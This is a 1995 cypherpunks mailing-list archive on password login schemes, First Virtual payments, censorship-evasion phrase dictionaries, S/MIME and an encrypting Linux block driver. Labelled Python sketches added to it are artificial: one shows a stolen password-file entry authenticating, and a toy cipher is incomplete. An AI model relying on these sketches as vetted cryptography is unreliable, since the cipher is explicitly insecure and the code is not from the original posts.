The account for Carol Anne Braddock is now activated.  
Your First Virtual account identifier is:

    newt-carolann

Please SAVE YOUR FIRST VIRTUAL ACCOUNT IDENTIFIER, and use it when you
buy or sell information.  (NOTE: This account identifier differs from
the ID-choice that you provided when you applied for your account.  We
have added a unique prefix.)

You may begin using your account to sell information over the Internet
immediately!

Exhibit #2 Your Letter Today.

From sgcs-server@card.com Tue Jul 25 18:32:24 1995
Date: Tue, 25 Jul 1995 18:23:24 -0500
From: sgcs-server@card.com
To: cab8@censored.org
Subject: change in account status

This is an automated message from First Virtual's Internet Payment System.

When we tried to verify the the bank account information associated with
Carol Anne Braddock, the verification failed.

    
    INVALID ACCOUNT NUMBER


Once this matter is corrected, we will be able to pay you for your
sales.  If you have changed your checking account, please follow the
directions below.  Otherwise, please send e-mail to:

    support-payout-failure@card.com


CHANGING THE CHECKING ACCOUNT NUMBER USED FOR PAYMENT

If you wish to change the account number of the checking account used
to pay you, please send e-mail to:

    chgacct@card.com

The ENTIRE body of your message should contain EXACTLY two lines:

    Account-ID: your First Virtual account identifier
    Financial-Changes: yes

We will send you a confirming note.  After you confirm, we will send
you e-mail with a new application-ID and instructions on sending us a
check for $10.00 (ten US dollars, to cover our paper processing
expenses).

--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew.Spring@ping.be (Andrew Spring)
Date: Tue, 25 Jul 95 09:59:21 PDT
To: cypherpunks@toad.com
Subject: Re: big word listing
Message-ID: <v01510103ac39a90b698b@[193.74.217.8]>
MIME-Version: 1.0
Content-Type: text/plain


>
>Instead of that, send H(pid,clock,hostname,H(password)) to the server, for
>some hash function H().  Then the server only needs to keep H(password)
>around, rather than the plain password.  This is similar to current
>systems, except the plain password isn't sent across the network.
>
>H() can be whatever you fancy; 25 crypts, MD5, SHA-1, etc.  Of course,
>I'm sure this is far from being a new idea...

Keeping H(password) on the server and logging in with H(blob,H(password)) is
no different than keeping the password on the server and logging in with
H(blob,password).  Anyone who can read the password file on the server can
authenticate himself.

To protect against packet sniffers monitoring your login stream _and_
system crackers looking at the password file, you need some form of PKC.

Free-after-1997 example:
        g is a generator of a prime p.

        password is X (0<X<p);

        password file has g^X mod p.

        login server generates Y, issues challenge g^Y.
        expected response is g^XY mod p

        login client has X, generates (g^Y)^X = g^XY mod p.

        J. Random SuperHacker can get g^X, and g^Y, but not g^XY.

Free-after-2000 example.
        Server Has RSA Public Key
        Client has Private Key.

        Server generates challenge.

        Client signs [Hash of] challenge.



--
Thank you VERY much!  You'll be getting a Handsome Simulfax Copy of your
OWN words in the mail soon (and My Reply).
<Andrew.Spring@ping.be> PGP Print: 0529 C9AF 613E 9E49  378E 54CD E232 DF96
   Thank you for question, exit left to Funway.
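
Added example (not part of the post above): both login schemes side by side in Python, each tried once by the real user and once by someone holding only the password-file entry. SHA-256 stands in for H(), and the toy group, the password-to-X mapping and all names are assumptions of this example.

```python
import hashlib
import hmac
import secrets

# Toy group constructed for this example: the Mersenne prime 2**127 - 1 with
# base 3.  Readable, but far too small for real use.
P = 2**127 - 1
G = 3


def H(*parts):
    """SHA-256 over length-prefixed fields (stand-in for the post's H())."""
    h = hashlib.sha256()
    for part in parts:
        h.update(len(part).to_bytes(4, "big") + part)
    return h.digest()


# Scheme 1: password file holds H(password); login sends H(blob, H(password)).
def hash_enroll(password):
    return H(password.encode())


def hash_response(blob, verifier):
    return H(blob, verifier)


def hash_verify(blob, response, file_entry):
    return hmac.compare_digest(response, H(blob, file_entry))


# Scheme 2: password file holds g^X mod p; login answers g^Y with g^XY mod p.
def exponent(password):
    # Assumption of this example: X is derived by hashing the password
    # into the range 0 < X < p.
    digest = hashlib.sha256(password.encode()).digest()
    return int.from_bytes(digest, "big") % (P - 1) + 1


def dh_enroll(password):
    return pow(G, exponent(password), P)


def dh_challenge():
    y = secrets.randbelow(P - 2) + 1          # server's fresh secret Y
    return y, pow(G, y, P)                    # (kept by server, sent to client)


def dh_response(challenge, password):
    return pow(challenge, exponent(password), P)


def dh_verify(y, response, file_entry):
    expected = pow(file_entry, y, P)          # (g^X)^Y
    return hmac.compare_digest(expected.to_bytes(16, "big"),
                               (response % P).to_bytes(16, "big"))


def compare_schemes(password="constructed-sample-password"):
    """Log in once as the user and once holding only the password-file entry."""
    blob = b"pid=412|clock=806712000|hostname=client.example"  # constructed
    h_entry = hash_enroll(password)
    user_h = hash_verify(blob, hash_response(blob, hash_enroll(password)), h_entry)
    # The file entry is the only secret input to the response.
    file_h = hash_verify(blob, hash_response(blob, h_entry), h_entry)

    d_entry = dh_enroll(password)
    y, challenge = dh_challenge()
    user_d = dh_verify(y, dh_response(challenge, password), d_entry)
    # g^X and g^Y multiply to g^(X+Y); the server expects g^(XY).
    file_d = dh_verify(y, (d_entry * challenge) % P, d_entry)
    return {"hash_user": user_h, "hash_file_only": file_h,
            "dh_user": user_d, "dh_file_only": file_d}


if __name__ == "__main__":
    for name, accepted in compare_schemes().items():
        print(f"{name:15} accepted={accepted}")
```

Because X is derived from a password, a copied g^X entry can still be tested offline against guesses by computing g^guess for each candidate. The scheme removes the password-equivalent file entry, not the need for a password that resists guessing.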






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Tue, 25 Jul 95 19:29:27 PDT
To: Nathaniel Borenstein <nsb@nsb.fv.com>
Subject: "Only on the Cypherpunks list..."
Message-ID: <ac3af6120f021004a990@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:00 PM 7/25/95, Nathaniel Borenstein wrote:

>Well, only on the cypherpunks list would you be likely to find general
>agreement that PGP'ed credit card numbers are "easier" than First
>Virtual.  Many thousands of extremely naive net citizens are now happy
>FV customers, and I seriously doubt that most of them could master PGP
>without a full-day tutorial.  (We're not talking about rocket scientists
>here, folks.)

A lot of truth here...sometimes the perfect is the enemy of the good.

After all, only on the Cypherpunks list would you be likely to find general
agreement that setting up a separate Intel box running Linux so one can
create a suitable mail client is the preferred way to do secure e-mail?

(Smileys for the :=)-impaired...I have nothing against Linux, and even
browsed the new O'Reilly book recently. But I'm _still_ glad I'm "just a
Mac user.")

I have no idea what First Virtual's current or future business plans are,
but I do expect more solid encryption, a la PGP or "real" RSA (licensed),
will be coming soon. I assume FV is planning for this likely development.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (UnCensored Girls Anonymous)
Date: Tue, 25 Jul 95 17:52:13 PDT
To: ekr@eit.COM (Eric Rescorla)
Subject: Re:  You have cashed my check....
Message-ID: <199507260052.RAA21103@mailhost.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Look at the .sig
And if it's a system that's vaporware
we all need to know about it.

And if it is corrected, part 17/713 will have begun to
do its job, in a 'realworld' situation.

>Please don't send this here. It has no place on this list.
>
>-Ekr
>
>
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Tue, 25 Jul 95 12:37:47 PDT
To: cypherpunks@toad.com
Subject: ANNOUNCE: Regulatory Arbitrage - Free Speech Server
Message-ID: <1298.9507251936@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



The Free Speech Server
----------------------

In an attempt to preempt Senator Exon and his thought police, and to
demonstrate to such other utterly misguided, utterly clueless
net-illiterates who somehow get ahold of the notion that it is even
*possible* to censor people's words and conversations on the Internet,
that what they seek is indeed impossible.

This is a simple demo of why it is impossible to censor the net.  The
Net is international, and in the apt words of Tim May's .sig quote:

  "National borders are just speed bumps on the information superhighway."

The concept of "Regulatory Arbitrage" term meaning of course: shopping
for suitable regulations, so if the US has silly "indecency" laws,
well just store your words in another jurisdiction.


Free Speech Server, jurisdiction Netherlands
--------------------------------------------

Alex de Joode has kindly hosted an exon(tm) free speech server on
replay.com:

	http://www.replay.com/exon/

is an automated double-speak translator.  It will translate between
text in government approved thought policed language back into free
speech.

So, the canonical example, a complaint against Senator Exon (spit),
Exonized(tm) so that even the most zealous US government internet
thought police could not complain:

----------------------------------------------------------------------
  Senator Exon may I express my annoyance you're a person who is
  overly sensitive to vulgar speech.  This has lowered my opinion of you
  considerably for your work on the communications decency bill.

  President Clinton and his crowd of law enforcement officials seem to
  be overly keen in their attempts to regulate the information super
  highway.  

  In my opinion they are just understandably scared of losing their much
  abused so called legitimate wiretap capabilities.  It seems highly
  inappropriate that incompetents like you should be deciding matters
  about which you have little knowledge.
----------------------------------------------------------------------

Feed that into the WWW forms interface on www.replay.com (click on the
unexonize toggle button, and select the "exon" dictionary), and you get
back my original message to Exon, ahh much better this really says
what I had to say:

----------------------------------------------------------------------
  X-Regulatory-Arbitrage-URL: http://www.replay.com/exon/
  X-Authors-Preferred-Speech: exon
  X-Comment: Regulatory Arbitrage in action, free speech server NL


  Exon fuck you you're a prudish prick. May you rot in hell for your
  work on the government censorship bill.

  Slick Willy and his gang of jack booted thugs seem to be fucking
  falling over themselves in their attempts to censor the net.

  In my opinion they are just scared shitless of losing their illegal
  wiretaps. It seems fucking way out of order that assholes like you
  should be deciding matters about which you know squat.
----------------------------------------------------------------------


The mechanism used to do the translation is phrase replacement, there
are facilities for you to add your own phrases if the dictionaries do
not cover what you want to say.  Please join in and add your own
phrases, so that the dictionaries get more interesting.

It works by replacing phrases, so in the above:

'fuck you'                    <->   'may I express my annoyance'
'fucking way out of order'    <->   'highly inappropriate'
'know squat'                  <->   'have little knowledge'

etc.

Jurisdictional Information
--------------------------

The first server is located in the Netherlands, so there are liberal
pornography laws, lower age of consent, no thought crimes, freedom of
speech, and privacy are still valued, there are no restrictions on
"indecent speech", no restrictions on crypto export, etc, etc.

The idea is that in your own jurisdiction (US or other oppressive
regime with government censorship) you are only saying something
within the bounds of censored government speech and thought guidelines,
and yet you have a comment, which says what language you *would* use
if you weren't being censored, ie you include as a header, or a
comment in your post what your preferred speech is in terms of a
selection of "exon" dictionaries:

	X-Authors-Preferred-Speech: exon,legislese,sarcasm

You haven't actually *said* anything which would require 'correction'
by the thought police, rather you have just said what words you would
use if you were allowed to.

You could also view it as a form of (weak) text stego, saying one
thing, but meaning another to a sufficient extent to maintain
plausible deniability.

Uses
----

It is starting to look like the US will have in place a set of
regulations which will make it illegal to use "vulgar speech" or
"indecent speech" on the internet.  In fact it is looking like you
will be able to say less on the internet than could be written in a
book in a bookstore or library.

Whilst the above example was in terms of 4 letter words, there are
dictionaries for several topics, which you as user of the system
can add phrases to for your amusement:

exon:      "fuck you"               <->    "may I express my annoyance"
sex:       "good fuck"              <->    "good sleep"
violence:  "kick the shit out of"   <->    "have a minor disagreement"
sarcasm:   "that prick Exon"        <->    "most honorable Sen Exon esq"
legislese: "pillage and loot"       <->    "govern"
legislese: "tyrannically suppress"  <->    "provide protections against"
graphic:   "lobotomised barney gif" <->    "we love barney"
crypto:    "fcrypt module"          <->    "conventional poetry quatrain"

The sky and your imagination is the limit.

Oh yes, and 'May I express my annoyance Senator Exon!' :-)

Adam
--
HAVE *YOU* EXPORTED RSA TODAY? --> http://dcs.ex.ac.uk/~aba/rsa/
--rsa--------------------------8<-------------------------------
#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length($n)&~1)/2)
-------------------------------8<-------------------------------
TRY: rsa -k=3 -n=7537d365 < msg | rsa -d -k=4e243e33 -n=7537d365
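
The phrase-replacement mechanism described in the message above, as an added sketch (not the replay.com server's code): it reads the X-Authors-Preferred-Speech header, applies the named dictionaries in either direction in a single longest-match-first pass, and matches on word boundaries so that "govern" inside "government" is left alone. The phrase pairs are copied from the post; the function names, the capitalisation handling and the ambiguity check are assumptions.

```python
import re

# Phrase pairs copied from the post: (free speech, approved speech),
# grouped under the dictionary names the post lists.
DICTIONARIES = {
    "exon": [("know squat", "have little knowledge")],
    "sarcasm": [("that prick Exon", "most honorable Sen Exon esq")],
    "legislese": [("pillage and loot", "govern"),
                  ("tyrannically suppress", "provide protections against")],
}

def preferred_speech(header_line):
    """Return the dictionary names listed in an X-Authors-Preferred-Speech header."""
    name, _, value = header_line.partition(":")
    if name.strip().lower() != "x-authors-preferred-speech":
        raise ValueError("not an X-Authors-Preferred-Speech header")
    names = [n.strip() for n in value.split(",") if n.strip()]
    unknown = [n for n in names if n not in DICTIONARIES]
    if unknown:
        raise ValueError("unknown dictionaries: %s" % ", ".join(unknown))
    return names

def _table(names, unexonize):
    """Build source -> target phrases; refuse a source phrase that maps two ways."""
    table = {}
    for n in names:
        for free, approved in DICTIONARIES[n]:
            src, dst = (approved, free) if unexonize else (free, approved)
            if src.lower() in table:
                raise ValueError("phrase %r is ambiguous across dictionaries" % src)
            table[src.lower()] = dst
    return table

def translate(text, names, unexonize=False):
    """Exonize (default) or unexonize text using the selected dictionaries."""
    table = _table(names, unexonize)
    if not table:
        return text
    # Longest phrase first, so a short phrase never pre-empts a longer one.
    ordered = sorted(table, key=len, reverse=True)
    pattern = re.compile(r"\b(?:%s)\b" % "|".join(map(re.escape, ordered)),
                         re.IGNORECASE)

    def swap(match):
        out = table[match.group(0).lower()]
        # Keep a sentence-initial capital on the replacement.
        return out[0].upper() + out[1:] if match.group(0)[0].isupper() else out

    # One pass: replaced text is never rescanned, so pairs cannot chain.
    return pattern.sub(swap, text)

# Constructed sample post (header plus approved-speech body).
SAMPLE_HEADER = "X-Authors-Preferred-Speech: exon,legislese"
SAMPLE_BODY = "They govern, and have little knowledge about government."

if __name__ == "__main__":
    names = preferred_speech(SAMPLE_HEADER)
    original = translate(SAMPLE_BODY, names, unexonize=True)
    print(original)
    print(translate(original, names))
```

Any innocent use of a target phrase (a plain "govern") is also rewritten on the way back, which is what makes the scheme deniable and also what makes it lossy.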





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 25 Jul 95 21:02:07 PDT
To: cypherpunk@toad.com
Subject: cypherpunks-lite
Message-ID: <199507260359.UAA01559@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Does anyone have eric blossom's email address? I'd like to sub
to his cpunks-lite.

Thanks,
-- 
sameer						Voice:   510-601-9777
Network Administrator				Pager:	 510-321-1014
Community ConneXion: The NEXUS-Berkeley		Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joel Hames" <jhames@mail.deltanet.com>
Date: Tue, 25 Jul 95 22:35:36 PDT
To: cypherpunks@toad.com
Subject: Re: Banks on the Net (Was: Re: Questions about Conferences)
Message-ID: <9507260535.AA28774@deltanet.com>
MIME-Version: 1.0
Content-Type: text/plain


In my previous post, I asked about the security of First Security 
National Bank, which doesn't exist.

Enzo is right, I was wondering if anyone had information on the 
security of Security First National Bank (www.sfnb.com).

Thanks
Joel Hames
jhames@deltanet.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hal9001@panix.com (Robert A. Rosenberg)
Date: Tue, 25 Jul 95 21:03:02 PDT
To: cypherpunks@toad.com
Subject: Re: S/MIME and the Future of Netscape
Message-ID: <v0213050aac3b0b3f670f@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:27 7/24/95, Timothy C. May wrote:
>At 12:54 PM 7/23/95, Bob Snyder wrote:
>>tcmay@sensemedia.net said:
>>> With regard to SSL and Netscape not being open to outside developers,
>>> several leading e-mail outfits, including Qualcomm, Netscape,
>>> Frontier, etc., are working on an interoperable secure e-mail
>>> standard called "Secure/MIME," or "S/MIME."
>>
>>Do you have sources for this information?  MOSS is out there at least as a
>>Internet Draft, and possibly further along, and Steve Dorner of Qualcomm, the
>>original author of Eudora, is pretty active in the MIME community and I doubt
>>he would support a second MIME type to do the same thing...
>
>Some of you have expressed skepticism about the mention of "S/MIME."
[snip]

All MOSS does is designate the MIME Headers/etc to support Encrypting
and/or Signing MIME Parts. It says nothing as to how you do the Encoding or
create Signature - only how to package the two parts into a MIME format
once you have them. Thus S/MIME is/could-be an implementation of MOSS (as
would be a MUA that used the MOSS formats to package a PGP signature or
Encrypted Message).

For those who want to read the docs, just send this message:

>To: mailserv@ds.internic.net
>From: YOUR-ADDRESS-GOES-HERE
>
>ENCODING mime
>FILE /internet-drafts/draft-ietf-pem-mime-08.txt
>FILE /internet-drafts/draft-ietf-pem-sigenc-03.txt






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jed@blaze.cs.jhu.edu (Jeremy Rauch)
Date: Tue, 25 Jul 95 19:31:55 PDT
To: cypherpunks@toad.com
Subject: Re: Exporting from Canada (was Re: Let's try breaking an SSL RC4 key)
In-Reply-To: <9507251516.AA21669@spirit.aud.alcatel.com>
Message-ID: <3v49e6$9sj@blaze.cs.jhu.edu>
MIME-Version: 1.0
Content-Type: text/plain



Daniel R. Oelke (droelke@spirit.aud.alcatel.com) wrote:

: > of PGP...would you?

: I would use a precompiled version of PGP *if* it came from
: and was signed by someone I trusted.
: After all - I don't read all the source code - do you?

You mean you don't?!!!
But seriously, I get it directly from MIT, check the checksums, etc.  I'm
pretty sure that it hasn't been tampered with.  And, actually, I've read
a good deal of the source code...especially the rsaref library.  Not cause
I'm paranoid, just interested.
If I get the source code from, say, my friend, who I trust, who got it from 
someone he trusted, and so on down the line, the line of trust falls into
question.  Who's to say someone doesn't like someone on that line, and
modifies the code...don't you have "friends" you don't like? :)


: > And, note, it says substantial change in value...I don't know if this is taken
: > to mean monetary, or usability...the latter might work.  
: > It's an interesting idea.
: > Jeremy
: > 
: I would say that if you can sell something that people
: would otherwise get for free, then you have added value.
: So, pre-compile for a couple of architectures, and then
: slap them on a CD-ROM with source.  
: Definite tangible value from the CD-ROM then.

: Dan
: ------------------------------------------------------------------
: Dan Oelke                                  Alcatel Network Systems
: droelke@aud.alcatel.com                             Richardson, TX
: http://spirit.aud.alcatel.com:8081/~droelke/

--
 ____________________________________________________________________________
| Jeremy Rauch              .--~~,__   |                                     |
|              :-....,-------`~~'._.'  |         jed@cs.jhu.edu              |
|               `-,,,  ,_      ;'~U'   |    alhambra@jhu.edu                 |
| Johns Hopkins  _,-' ,'`-__; '--.     |         jed@jhunix.hcf.jhu.edu      |
|   University  (_/'~~      ''''(;     |     http://server.cs.jhu.edu/~jed   |
|______________________________________|_____________________________________|
Finger for PGP key
				Member, *the Guild

          The light that burns twice as bright burns half as long




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Christian Lagerberg" <clg@glab.se>
Date: Wed, 26 Jul 95 03:41:31 PDT
To: cypherpunks@toad.com
Subject: mailing list
Message-ID: <199507261038.GAA27424@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

REGARDING                mailing list

hit me :=)

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMBYbGCoZzwIn1bdtAQGOJwF/bMkdrpPv/62bbIv+mlD4XjS9P5+bgezu
RBQLRMZSSUkcL2RYa4kfUGCs5mO3ZVQ/
=KtMP
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Wed, 26 Jul 95 04:54:18 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: "Only on the Cypherpunks list..."
In-Reply-To: <ac3af6120f021004a990@[205.199.118.202]>
Message-ID: <8k5WhM_Mc50e0ssz9y@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail: 25-Jul-95 "Only on the Cypherpunks li.. Timothy C.
May@sensemedi (1596*)

> I have no idea what First Virtual's current or future business plans are,
> but I do expect more solid encryption, a la PGP or "real" RSA (licensed),
> will be coming soon. I assume FV is planning for this likely development.

Well, one thing we've announced in public is that if/when Visa and
MasterCard actually announce the encryption standard that they have said
they're going to define, we will support it.  Basically, our attitude
towards encryption has been that the lack of widely-agreed-upon
standards and lack of widespread deployment were show-stoppers for
large-scale commerce.  Our hope is that if Visa & MC agree on a format,
it won't have those problems.  We didn't think that FV itself had enough
clout to set an encryption standard for the world, nor did we see enough
of a bandwagon behind the current PGP format (or any others).  So we
concentrated on making commerce work without encryption, building up our
customer base, our customer service department, and so forth.  We're
promising our sellers as smooth a transition to the eventual standards
as we can possibly manage...  -- Nathaniel
--------
Nathaniel S. Borenstein <nsb@fv.com>    |           When privacy is outlawed,
Chief Scientist, First Virtual Holdings |     only outlaws will have privacy!
FAQ & PGP key: nsb+faq@nsb.fv.com       | SUPPORT THE ZIMMERMAN DEFENSE FUND!

---VIRTUAL YELLOW RIBBON-->> zldf@clark.net <http://www.netresponse.com/zldf>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@poboy.b17c.ingr.com (Paul Robichaux)
Date: Wed, 26 Jul 95 07:53:18 PDT
To: hfinney@shell.portal.com (Hal)
Subject: Re: Netscape the Big Win
In-Reply-To: <199507211727.KAA06527@jobe.shell.portal.com>
Message-ID: <199507261447.AA17788@poboy.b17c.ingr.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hal said:
> This sounds very good if it already is almost working.  The TCP
> connection which is opened would have to be to a server on the local
> machine, so it would be important that the software support that.  Also,
> the local SOCKS relay would of course not want its winsock calls to be
> intercepted and translated in this way, so there would need to be some
> alternative way to access "vanilla" winsock.  Can you give any
> more information on the NEC work?

This should be fairly straightforward: take the existing winsock.dll
or winsock32.dll and rename it. Install the NEC DLL with the old
winsock's name, then have the NEC DLL do a LoadLibrary() to attach the
original version.

> I have written a simple dummy relay for winsock and it requires a pretty
> different programming style than for Unix.  Netscape has a habit of
> firing off a bunch of requests at once, so it has to be extremely
> asynchronous.  For Windows this means you get a windows message every
> time a packet arrives and use non-blocking I/O.  In Unix this is usually
> handled by forking a new process to handle each independent connection.
> Non-blocking I/O can be used in Unix but I don't think there is a
> non-blocking connect as there is in Windows.  Maybe Windows 95 will allow
> a more Unix-style communication model, though.  Should the proxy require
> Windows 95, or will Windows 3 still be in widespread use for another
> year or two?

Asynchronous requests are the best way to implement I/O under Windows
(3.1, '95, and NT.) Any app that's threaded (Free Agent and Netscape
come to mind) will benefit, as will any user who's using a
multiprocessor machine.

If you're willing to assume the existence of Win95 or WinNT, you can
always spawn a new thread for each connection.

- -Paul

- -- 
Paul Robichaux, KD4JZG       | Do you support free speech? Even when
perobich@ingr.com            | you don't like what's being said?
		 Be a cryptography user. Ask me how.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMBZVcafb4pLe9tolAQHrHwQAhBAtIAZnaL2gh1BhZeE6WWQ1UQK7ffB2
XRZReUNzAVpCyvllKPDiN5TgUSuit8XeB4BzHOStXkNMJGlLE0vqTr5j5y2S0Fzo
nisi5Ve5+8XWJ8wFrshldfFcLyFuOK3LeL9cAKXQQrQ2GdxluusqBzqYHFM8koPP
zWI2YiF0VHM=
=yzFt
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@aeinet.com>
Date: Wed, 26 Jul 95 10:03:19 PDT
To: cypherpunks@toad.com
Subject: Encrypting block driver for Linux...need some advice
Message-ID: <Pine.LNX.3.91.950726091131.129A-100000@comet.aeinet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

All,

I dropped off the face of the earth for a few months while fighting a 
particularly *nasty* divorce, and to nurse my wounds, I immersed myself 
in writing crypto-code :)

What I've come up with is a loadable module block device driver for Linux 
that implements transparent encryption/decryption (is there a generic 
word that means both, like 'cryption' or some such?).

The way it works is by 'attaching' a filespec to the block driver, and 
translating block requests into read/write requests at the appropriate 
offset in the file.  During the read or write, the data is transformed 
with either DES or 3DES (RSAREF implementation).  The key is an MD5 hashed 
passphrase entered by the user when attaching the filespec.  The key is 
not stored anywhere, and there is no hidden structure to the ciphertext 
(such as a header block.)

The filespec can represent pretty much anything--another block device 
such as a hard drive partition or floppy drive, a regular file, a remote 
NFS exported file, CDROM, whatever.  If the file is remote, only ciphertext
is transmitted on the wire.

This part is working rather well at this point (as long as everything is 
done as root), which brings me to the crux of my post.

Being a Unix programming novice (lots of C experience on DOS/Windows), 
I'm pretty clueless when it comes to Unix level security issues.  I need 
to define and implement the appropriate behavior of the device when 
dealing with access to the data by different users.  Ideally, I want 
something infinitely flexible and configurable--why program in policy?--so 
that the user/admin can deal with a variety of threat models.

Another, more crypto related question--how to deal with IV's?  Right now, 
I'm using 512 byte sectors with CBC.  For each sector, the IV is the 
sector number.  This frustrates the known plaintext attack issue, but I'm 
not sure if such a simple scheme is really effective.  Probably not.

Then there is a whole host of issues relating to cryptographically 
hygienic programming practices...of which I am also pretty ignorant 
(especially on Unix.)

I guess you could say the software is at the "proof of concept" stage, 
and lacks all sorts of desirable features.  But it works (with many 
bugs I'm sure)...and I have to give credit to the Linux effort:  so far I've 
done this with nothing but the kernel source and the kernel hackers guide 
as a reference.  I took a look at doing this with Windows 95 and didn't 
even know where to start. (No, I'm not bashing Windows--I love Win95, use 
it all day at the office and get loads of work done with it--but Linux 
kernel hacking is much more fun.  An ideal world would have the Win95
UI/Plug & Play stuff coded on top of a Unix kernel :) 

In any case, suggestions, criticism, and comments are welcome.  The software
will eventually be GPL licensed when it is a bit more mature.

==
Johnathan Corgan       "For the first time in history, it is possible to
jcorgan@aeinet.com      have absolute privacy over arbitrary distances."
PGP Key Fingerprint:    4F 28 69 B8 76 2E 42 3E  8B 4C 12 BB 3A 43 D4 07


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMBaCnU1Diok8GKihAQGyoQP+JAYyukotfejK84bm8olDs1GMd6zlwuXc
S+91DwrPRb8pyciEC6lIoLNS3coMgPdGTEksNNJMbuIXupJNnXnSum9XrPkMzEkG
gL/x6n6v4Jzm9B9IyvIV2R1UrIK893EGQbPKTIgGNNsvORJ/NB8nkoMfZalVlNnD
Hl3z3vaYgtU=
=grpJ
-----END PGP SIGNATURE-----
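
On the IV question in the message above: with CBC, an IV equal to the sector number is known to anyone who can place a file on the volume, so plaintext chosen without the key can produce identical ciphertext sectors that are visible on the raw device or on the wire. The sketch below is an added example, not Corgan's driver code; the Feistel cipher is a constructed stand-in for DES, and the keyed IV (the sector number encrypted under a hash of the volume key, the construction later known as ESSIV) is an assumed remedy that the post does not propose.

```python
import hashlib

BLOCK = 8      # 64-bit block, the size DES uses
SECTOR = 512   # sector size given in the post

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key, rnd, half):
    # Round function of the stand-in cipher (constructed; NOT DES, not secure).
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:4]

def encrypt_block(key, block):
    """8-round Feistel permutation on one 64-bit block."""
    l, r = block[:4], block[4:]
    for rnd in range(8):
        l, r = r, xor(l, _f(key, rnd, r))
    return l + r

def decrypt_block(key, block):
    l, r = block[:4], block[4:]
    for rnd in reversed(range(8)):
        l, r = xor(r, _f(key, rnd, l)), l
    return l + r

def derive_key(passphrase):
    # As in the post: the key is the MD5 hash of the passphrase.
    return hashlib.md5(passphrase).digest()

def cbc_encrypt_sector(key, iv, plaintext):
    if len(plaintext) != SECTOR:
        raise ValueError("plaintext must be exactly one sector")
    prev, out = iv, bytearray()
    for off in range(0, SECTOR, BLOCK):
        prev = encrypt_block(key, xor(plaintext[off:off + BLOCK], prev))
        out += prev
    return bytes(out)

def cbc_decrypt_sector(key, iv, ciphertext):
    prev, out = iv, bytearray()
    for off in range(0, SECTOR, BLOCK):
        block = ciphertext[off:off + BLOCK]
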